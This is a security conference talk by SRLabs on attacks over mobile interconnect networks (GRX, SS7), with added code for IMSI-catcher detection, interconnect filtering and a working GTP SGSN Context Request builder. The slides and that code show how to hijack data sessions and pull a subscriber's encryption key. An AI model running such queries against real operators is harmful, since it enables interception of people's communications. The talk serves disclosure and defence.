CCCamp SRLabs Advanced Interconnect Attacks.v1
Advanced interconnect attacks
Chasing GRX and SS7 vulns

Karsten Nohl <[email protected]>
Luca Melette <[email protected]>
Agenda
[Chart: release timeline with rows for 2G, 3G and 4G and an axis marked 10, 100, 1,000: GSMmap apk released 2014-03; SnoopSnitch releases 2014-06, 2014-09, 2014-12, 2015-03, 2015-06]
SnoopSnitch assigns a score to each heuristic and sums scores to form catcher events

No proper neighbors
Suspicious cell configuration
Suspicious cell behavior
Lack of proper encryption:
  No encryption -or- downgrade to crackable A5/1 or A5/2
  Delayed Cipher Mode Complete (due to A5/1 cracking time)

[Chart: share of catcher events per heuristic group (Config, Behavior, Encryption, No neighbors [K1]), axis 0% to 75%; near-certain catcher sightings, i.e. several heuristics triggered: 3%]
False positive causes

No proper neighbors
Suspicious cell configuration: lonesome location area, out-of-place location area
  1. Networks often change abruptly, e.g. when entering the subway.
  2. SnoopSnitch cannot directly read the radio channel (ARFCN) from the baseband. In the few cases its heuristic guesses wrong, an IMSI catcher event is reported.
Suspicious cell behaviour
  2. Can IMSI catchers really not use A5/3 and other strong crypto? We are about to find out!
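One way to implement the scoring the two slides above describe, as an added example written for this page rather than SnoopSnitch's own code: each heuristic fires on its own, the scores are summed, and the sum is classified into an event level. The weights, the two thresholds, the 1.5 s Cipher Mode Complete limit, the coverage-gap rule for the subway case and the sample cells are all assumptions, not values from the talk; the ARFCN is taken as known, which is exactly the input the slide says the baseband does not expose directly.

```python
"""Heuristic IMSI-catcher scoring in the style the slides describe: independent
heuristics, summed scores, catcher events. Written for this page as an
illustration, not SnoopSnitch code. Weights, thresholds and sample cells are
constructed assumptions."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Invented weights, one per heuristic named on the slide.
WEIGHTS: Dict[str, float] = {
    "no_neighbors": 2.0,        # no proper neighbor list announced
    "lonesome_lac": 2.0,        # no neighbor shares the cell's location area
    "out_of_place_lac": 1.0,    # LAC never seen in this surrounding before
    "no_encryption": 4.0,       # A5/0
    "downgrade": 3.0,           # A5/1 or A5/2 after the network was seen using A5/3
    "delayed_cmc": 2.0,         # slow Cipher Mode Complete (A5/1 cracking time)
}
SUSPICIOUS, NEAR_CERTAIN = 3.0, 7.0   # invented event thresholds
CMC_DELAY_LIMIT_MS = 1500             # assumed: longer suggests live A5/1 cracking
CIPHER_RANK = {"A5/0": 0, "A5/2": 1, "A5/1": 2, "A5/3": 3}


@dataclass
class Cell:
    arfcn: int                          # radio channel (assumed known here)
    lac: int
    cell_id: int
    neighbor_arfcns: List[int]
    cipher: str                         # "A5/0" means no encryption
    cmc_delay_ms: Optional[int] = None  # Cipher Mode Command -> Complete, if measured
    after_coverage_gap: bool = False    # first cell after signal loss, e.g. entering the subway


class CatcherDetector:
    """Keeps a little history so the location-area heuristics have context."""

    def __init__(self) -> None:
        self.lac_of_arfcn: Dict[int, int] = {}
        self.best_cipher = "A5/0"

    def heuristics(self, cell: Cell) -> List[str]:
        hits: List[str] = []
        if not cell.neighbor_arfcns:
            hits.append("no_neighbors")
        else:
            neighbor_lacs = {self.lac_of_arfcn[a] for a in cell.neighbor_arfcns
                             if a in self.lac_of_arfcn}
            if neighbor_lacs and cell.lac not in neighbor_lacs:
                hits.append("lonesome_lac")
        seen_lacs = set(self.lac_of_arfcn.values())
        # Networks change abruptly after a coverage gap (subway): a new LAC there is
        # expected, so it is not scored; otherwise every underground ride is an event.
        if seen_lacs and cell.lac not in seen_lacs and not cell.after_coverage_gap:
            hits.append("out_of_place_lac")
        if cell.cipher == "A5/0":
            hits.append("no_encryption")
        elif CIPHER_RANK[cell.cipher] < CIPHER_RANK[self.best_cipher]:
            hits.append("downgrade")
        if cell.cmc_delay_ms is not None and cell.cmc_delay_ms > CMC_DELAY_LIMIT_MS:
            hits.append("delayed_cmc")
        return hits

    def score(self, cell: Cell) -> Tuple[float, str, List[str]]:
        """Sum the triggered heuristics, then record the cell for later comparisons."""
        hits = self.heuristics(cell)
        total = sum(WEIGHTS[h] for h in hits)
        self.lac_of_arfcn[cell.arfcn] = cell.lac
        if CIPHER_RANK[cell.cipher] > CIPHER_RANK[self.best_cipher]:
            self.best_cipher = cell.cipher
        level = ("near-certain" if total >= NEAR_CERTAIN
                 else "suspicious" if total >= SUSPICIOUS else "none")
        return total, level, hits


def run_sample() -> List[Tuple[float, str, List[str]]]:
    """Constructed trace: two normal cells, a subway cell, a catcher, a downgrading cell."""
    det = CatcherDetector()
    trace = [
        Cell(arfcn=10, lac=100, cell_id=1, neighbor_arfcns=[11, 12], cipher="A5/3"),
        Cell(arfcn=11, lac=100, cell_id=2, neighbor_arfcns=[10, 12], cipher="A5/3"),
        # New LAC right after losing coverage: expected, not an event.
        Cell(arfcn=50, lac=900, cell_id=9, neighbor_arfcns=[51], cipher="A5/3",
             after_coverage_gap=True),
        # No neighbors, unencrypted, slow Cipher Mode Complete: the textbook catcher.
        Cell(arfcn=77, lac=777, cell_id=7, neighbor_arfcns=[], cipher="A5/0",
             cmc_delay_ms=4200),
        # A5/1 after the network used A5/3, in a LAC none of its neighbors share.
        Cell(arfcn=12, lac=555, cell_id=3, neighbor_arfcns=[10, 11], cipher="A5/1"),
    ]
    return [det.score(c) for c in trace]
```

The fourth cell scores 9.0 (near-certain), the fifth 6.0 (suspicious); the subway cell scores nothing only because of the coverage-gap rule, which is the kind of dampening a real detector needs against the false-positive cause the slide names.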
Spot the difference: Not all catcher events are being uploaded
Agenda
The GRX network connects nodes along the Internet access path of mobile phones

[Diagram: Phone - RNC - SGSN - GRX - GGSN - Internet, with DNS reachable over the GRX]

Phone configures an APN. The APN's DNS entry determines which GGSN is used. The GGSN typically stays the same even when roaming.

PDP Context: collection of identifiers needed for data flow, including the TEID at each tunnel end
Research question: What can attackers do on GRX?

Fraud (-> P1Sec @ HITB) | MITM | Local intercept | Hijacking | DoS

[Diagram: SGSN - GRX - GGSN with the attacker on the GRX; focus of this talk. Prerequisites: SGSN reachability and IMSI]

Attacker needs:
1. GRX connectivity? Not always! (discussed herein)
2. IP of current SGSN. Query through:
   a. SRI-GPRS over SS7
   b. SRI-GPRS over GRX
   c. Send SGSN-ContextRequest to all possible SGSNs; one will respond (non-targeted)
3. Subscriber IMSI. Several methods exist for IMSI extraction:
   a. Various SS7 / HLR queries
   b. IMSI catching
   c. Passive sniffing
   d. Guessing from IMSI range
[Diagram: SGSN - GGSN, attacker next to the SGSN. CreatePDP establishes the TEIDs on both sides; UpdatePDP(TEID) sets a new GGSN IP]
[Diagram: attacker, SGSN, GGSN. 1. SGSNContextReq(IMSI) to the SGSN, which returns TEID and GGSN IP; 2. UpdatePDP(TEID); 3. UpdatePDP(TEID) to set a new GGSN IP]

Catch 1: Still don't know the TEID
Partial solution: entropy bugs in some SGSNs, e.g. TEID = 86093C47, TEID = 86498247
GTP control
[Diagram: attacker sends 1. SGSNContextReq to the SGSN, followed by 2. Context Ack; SGSN and GGSN shown]
[Diagram: attacker, two SGSNs with their RNCs. 1. SGSNContextReq obtains the Context; 2. Forward RelocationReq (Radio Msg, Context)]
[Diagram: attacker (as GGSN) - SGSN - phone. 1. PDUNotificationReq(IMSI, APN, IP); 2. ActivatePDP; 3. Accept]

PDUNotificationReq is used when data is received for a non-connected phone. It establishes a new connection.

Catch: The phone must be registered to the network but with no data connection established. Since newer phones always try to maintain a data connection, they seem to not support this mechanism and reject it.
[Diagram: attacker with its own Camel server and GGSN; SS7 STP, SGSN and DNS]

1. InsertSubscriberData(Camel server) cancels the data connection
2. Phone reconnects (immediately)
3. SGSN sends the APN to the Camel server for verification; the Camel server returns a corrected APN
4. SGSN looks up the GGSN IP as apn.mcc.mnc.gprs (OI) in DNS
5. Phone connects to the attacker GGSN

Catch 3: Requires Camel v3, which only a minority of operators supports as of now
Catch IMSI: NanoBTS or any other small cell

Demo

Request auth/encryption keys over GRX or SS7:
  GRX: SGSNContextReq
  SS7: SendAuthInfo or SendIdentification
Usually possible over a GRX or SS7 connection. Also possible over the Internet? (next chapter)
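The GRX query named on this slide, and the TEID it hands back on the hijacking slides earlier (including a check for the TEID entropy bug), as an added example written for this page; it is not SRLabs tooling. It frames an SGSN Context Request and parses an SGSN Context Response per 3GPP TS 29.060. The IMSI, addresses, TEIDs and Kc are constructed sample values, the reply builder is a reduced stand-in for what a serving SGSN sends, and only the GSM "security mode 0" MM Context (Kc and triplets) is decoded; verify the MM Context layout against the spec before relying on it for UMTS modes.

```python
"""GTPv1-C SGSN Context Request / Response framing (3GPP TS 29.060), the message behind
the 'query current key over GRX' step. Illustration written for this page, not SRLabs
tooling. IMSI, addresses, TEIDs and Kc are constructed sample values; the reply builder
is a reduced stand-in for what a serving SGSN sends."""
import struct
from typing import Dict, List, Tuple

SGSN_CONTEXT_REQ, SGSN_CONTEXT_RSP = 50, 51                    # GTP message types
IE_CAUSE, IE_IMSI, IE_RAI, IE_TEID_CP, IE_MM_CONTEXT, IE_GSN_ADDR = 1, 2, 3, 17, 129, 133
# Value lengths of fixed-size TV elements (type < 128); types >= 128 are TLV.
TV_LEN = {1: 1, 2: 8, 3: 6, 4: 4, 5: 4, 8: 1, 13: 1, 14: 1, 16: 4, 17: 4, 19: 1, 20: 1, 127: 4}


def tbcd(digits: str, length: int) -> bytes:
    """Telephony BCD: low nibble first, unused nibbles 0xF (an IMSI element is 8 octets)."""
    d = digits.ljust(2 * length, "f")
    return bytes(int(d[i + 1], 16) << 4 | int(d[i], 16) for i in range(0, 2 * length, 2))


def tbcd_decode(b: bytes) -> str:
    return "".join(f"{x & 0xF:x}{x >> 4:x}" for x in b).rstrip("f")


def rai(mcc: str, mnc: str, lac: int, rac: int) -> bytes:
    """Routing Area Identity: nibble-swapped MCC/MNC (2-digit MNC padded with F), LAC, RAC."""
    mnc3 = mnc[2] if len(mnc) == 3 else "f"
    plmn = bytes([int(mcc[1]) << 4 | int(mcc[0]), int(mnc3, 16) << 4 | int(mcc[2]),
                  int(mnc[1]) << 4 | int(mnc[0])])
    return plmn + struct.pack(">HB", lac, rac)


def gtp(msg_type: int, ies: bytes, teid: int, seq: int) -> bytes:
    """GTPv1 header; flags 0x32 = version 1, PT = GTP, sequence number present."""
    opt = struct.pack(">HBB", seq, 0, 0)          # sequence number, N-PDU, next ext header = none
    return struct.pack(">BBHI", 0x32, msg_type, len(opt) + len(ies), teid) + opt + ies


def build_sgsn_context_request(imsi: str, my_teid_c: int, my_ip: str, seq: int = 1) -> bytes:
    """What a 'new SGSN' sends: header TEID 0 (no tunnel yet), TEID-C and address to answer to."""
    ies = bytes([IE_RAI]) + rai("262", "01", 0x1234, 0x01)   # constructed RAI of the claimed SGSN
    ies += bytes([IE_IMSI]) + tbcd(imsi, 8)
    ies += bytes([IE_TEID_CP]) + struct.pack(">I", my_teid_c)
    ies += bytes([IE_GSN_ADDR]) + struct.pack(">H", 4) + bytes(int(o) for o in my_ip.split("."))
    return gtp(SGSN_CONTEXT_REQ, ies, teid=0, seq=seq)


def parse_gtp(pkt: bytes) -> Tuple[int, int, List[Tuple[int, bytes]]]:
    """Split a GTPv1-C message into (message type, header TEID, [(IE type, value), ...])."""
    flags, msg_type, length, teid = struct.unpack(">BBHI", pkt[:8])
    if flags >> 5 != 1:
        raise ValueError("not GTPv1")
    body = pkt[8:8 + length]
    if flags & 0x07:                 # E, S or PN set: 4 optional octets (no ext. headers assumed)
        body = body[4:]
    ies, i = [], 0
    while i < len(body):
        t = body[i]
        if t < 128:                  # TV: fixed length from the table
            n = TV_LEN[t]
            ies.append((t, body[i + 1:i + 1 + n]))
            i += 1 + n
        else:                        # TLV: 16-bit length follows the type
            n = struct.unpack(">H", body[i + 1:i + 3])[0]
            ies.append((t, body[i + 3:i + 3 + n]))
            i += 3 + n
    return msg_type, teid, ies


def keys_from_mm_context(mm: bytes) -> Dict[str, object]:
    """MM Context value (TS 29.060 7.7.28): octet 1 = spare | CKSN; octet 2 = security mode
    (bits 8-7), number of vectors (6-4), used cipher (3-1). Mode 0 is 'GSM key and triplets'
    with the 8-octet Kc next; the UMTS CK/IK modes are not decoded here."""
    info: Dict[str, object] = {"cksn": mm[0] & 0x07, "security_mode": mm[1] >> 6,
                               "used_cipher": mm[1] & 0x07}
    if info["security_mode"] == 0:
        info["kc"] = mm[2:10].hex()
    return info


def extract_keys(response: bytes) -> Dict[str, object]:
    """From an accepted SGSN Context Response: IMSI, the old SGSN's TEID-C and the key."""
    msg_type, _, ies = parse_gtp(response)
    fields = dict(ies)
    if msg_type != SGSN_CONTEXT_RSP or fields[IE_CAUSE][0] & 0xC0 != 0x80:   # 10xxxxxx = accepted
        raise ValueError("not an accepted SGSN Context Response")
    out: Dict[str, object] = {"imsi": tbcd_decode(fields[IE_IMSI]),
                              "old_sgsn_teid_c": struct.unpack(">I", fields[IE_TEID_CP])[0]}
    out.update(keys_from_mm_context(fields[IE_MM_CONTEXT]))
    return out


def constructed_context_response(imsi: str, old_teid_c: int, kc: bytes, cipher: int = 1) -> bytes:
    """Constructed serving-SGSN reply: Cause, IMSI, TEID-C, MM Context (mode 0, zero vectors,
    empty DRX/capability/container fields). Real replies add vectors, PDP contexts, GGSN addresses."""
    mm = bytes([0xF0 | 1, cipher & 0x07]) + kc + bytes(5)      # CKSN 1; mode 0, 0 vectors, cipher
    ies = bytes([IE_CAUSE, 128])                                # 128 = Request accepted
    ies += bytes([IE_IMSI]) + tbcd(imsi, 8)
    ies += bytes([IE_TEID_CP]) + struct.pack(">I", old_teid_c)
    ies += bytes([IE_MM_CONTEXT]) + struct.pack(">H", len(mm)) + mm
    return gtp(SGSN_CONTEXT_RSP, ies, teid=0xABCD, seq=1)


def teid_varying_nibbles(teids: List[int]) -> List[bool]:
    """Per hex digit, does it ever change across a TEID sample? A sound SGSN varies all eight;
    the slide's 86093C47 / 86498247 share half of theirs, which shrinks the guessing space."""
    hexes = [f"{t:08X}" for t in teids]
    return [len({h[i] for h in hexes}) > 1 for i in range(8)]
```

The request is 40 bytes: an 8-octet header, 4 optional octets, then RAI, IMSI, TEID-C and GSN Address. Nothing in it authenticates the sender, which is why the only defence is the filtering discussed in the next chapter: whoever can deliver this UDP datagram to the SGSN's GTP-C port and is answered gets the subscriber's current Kc back in the MM Context.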
Agenda
[Table: GTP endpoints reachable from the Internet, by network. Brazil: TIM; China: China Mobile Guangdong, China Mobile Shanghai; Korea: SK Telecom, Korea Telecom; Colombia: Colombia Móvil; USA: NewCore Wireless, Union Cell, Globecomm. The count columns (values in the extraction: 271k, 302k, 826, 580 GTP endpoints, 267, 267, 153, 76, 65, 12, 58, 54, 4, 47, 47, 10, 8, 1, 1) cannot be re-aligned to rows]

SGSNs disclose the current encryption key on the Internet!
Layer 2 parsing, Layer 3 parsing: GPRSdecode (srlabs.de/gprs); Wireshark (2G)

Query current key (2G & 3G): GRX: SGSNContextReq. Or even over the Internet!
Demo: Misuse subscriber IP
  GRX: SGSNContextReq
  GRX: UpdatePDP
                                   Necessary filter                                                   Prevalence
From non-roaming partner IP        Never expose GRX/SS7 on the Internet.                              Most networks have this filter, but not all
                                   Never talk to non-roaming partners.
Over GRX or SS7:
  Spoof roaming partner IP         Filter by GT (SS7) or IP (GRX)                                     Some networks distinguish roaming partners, many don't
  Be roaming partner               Velocity checks: Can a subscriber possibly have moved into the new network?
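The three filter rows as one working ingress check, added here as an example written for this page and not any operator's or SRLabs' code: refuse anything that is not a roaming partner, tie the node named inside the message to the partner that owns the transport address (global title on SS7, IP on GRX), and velocity-check location claims that arrive from a genuine partner. The partner table, the country coordinates, the 1000 km/h bound and the messages are constructed assumptions.

```python
"""Ingress policy for interconnect signalling, following the three filter rows on
the slide. Written for this page; not any operator's or SRLabs' code. Partner
table, coordinates, speed bound and messages are constructed assumptions."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from math import asin, cos, radians, sin, sqrt
from typing import Dict, List, Optional, Tuple

# Constructed roaming-partner table: GRX prefixes, SS7 global-title prefixes and a
# representative coordinate for the partner's country (used by the velocity check).
PARTNERS = {
    "partner-de": {"grx": [ip_network("10.10.0.0/16")], "gt": ["4917"], "pos": (52.5, 13.4)},
    "partner-br": {"grx": [ip_network("10.20.0.0/16")], "gt": ["5511"], "pos": (-23.5, -46.6)},
}
HOME_POS = (48.1, 11.6)         # our own network, constructed
MAX_SPEED_KMH = 1000.0          # assumption: nothing legitimate beats an airliner


@dataclass
class Message:
    transport: str      # "grx" or "ss7"
    source: str         # source IP (GRX) or calling-party global title (SS7)
    claimed_node: str   # address carried inside the message: GSN Address IE / VLR GT
    imsi: str
    when: datetime


def km_between(a: Tuple[float, float], b: Tuple[float, float]) -> float:
    """Great-circle distance (haversine), mean Earth radius 6371 km."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))


def partner_of(transport: str, addr: str) -> Optional[str]:
    """Which roaming partner owns this GRX address or SS7 global title, if any."""
    for name, p in PARTNERS.items():
        if transport == "grx" and any(ip_address(addr) in net for net in p["grx"]):
            return name
        if transport == "ss7" and any(addr.startswith(prefix) for prefix in p["gt"]):
            return name
    return None


class InterconnectFilter:
    def __init__(self, last_seen: Dict[str, Tuple[str, datetime]]) -> None:
        # imsi -> (network where we last registered the subscriber, when); "home" = ourselves
        self.last_seen = last_seen

    def position(self, network: str) -> Tuple[float, float]:
        return HOME_POS if network == "home" else PARTNERS[network]["pos"]

    def check(self, msg: Message) -> Tuple[bool, str]:
        # Row 1: never talk to non-roaming partners (and never face the Internet at all).
        src = partner_of(msg.transport, msg.source)
        if src is None:
            return False, "source is not a roaming partner"
        # Row 2: filter by GT (SS7) or IP (GRX): the node named inside the message must
        # belong to the same partner as the transport source, or it is spoofed.
        if partner_of(msg.transport, msg.claimed_node) != src:
            return False, f"claimed node does not belong to {src}"
        # Row 3: a genuine partner can still lie about the subscriber: velocity check.
        if msg.imsi in self.last_seen:
            prev_net, prev_when = self.last_seen[msg.imsi]
            hours = max((msg.when - prev_when).total_seconds() / 3600, 1 / 60)
            speed = km_between(self.position(prev_net), self.position(src)) / hours
            if speed > MAX_SPEED_KMH:
                return False, f"implausible move from {prev_net}: {speed:.0f} km/h"
        self.last_seen[msg.imsi] = (src, msg.when)
        return True, f"accepted from {src}"


def run_sample() -> List[Tuple[bool, str]]:
    """Constructed messages: Internet source, spoofed GT, plausible and implausible roamers."""
    t0 = datetime(2015, 8, 14, 12, 0)
    imsi = "262011234567890"
    f = InterconnectFilter({imsi: ("home", t0)})
    msgs = [
        Message("grx", "203.0.113.9", "203.0.113.9", imsi, t0 + timedelta(hours=1)),
        Message("ss7", "49171234", "55119876", imsi, t0 + timedelta(hours=1)),
        Message("ss7", "49171234", "49175555", imsi, t0 + timedelta(hours=1)),
        Message("grx", "10.20.3.4", "10.20.3.4", imsi, t0 + timedelta(hours=2)),
    ]
    return [f.check(m) for m in msgs]
```

The first two messages fall to the filters most networks already have or could add cheaply; the last one is the case the slide leaves without a prevalence figure: a real partner address, consistent inside and out, whose claim only fails because the subscriber was registered about 10,000 km away one hour earlier.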
Agenda
Mobile intrusion detection system: meant for you to keep a SnoopSnitch phone running at home to spot changes/anomalies
Live export of 2G, 3G, 4G traces
Tools.
OsmocomBB? rad1o?
Results.
Take aways.
Next events.

Mobile security: SnoopSnitch data workshop, Day 3, 17:00, Berlin village
Other SRLabs: Fuzzing with AFL, Day 2, 16:00, Hackcenter 1
Biometrics hacks, Day 3, 14:30, Hardware Hacking area
Hardware hack playground, all camp long, SRLabs camper

Questions?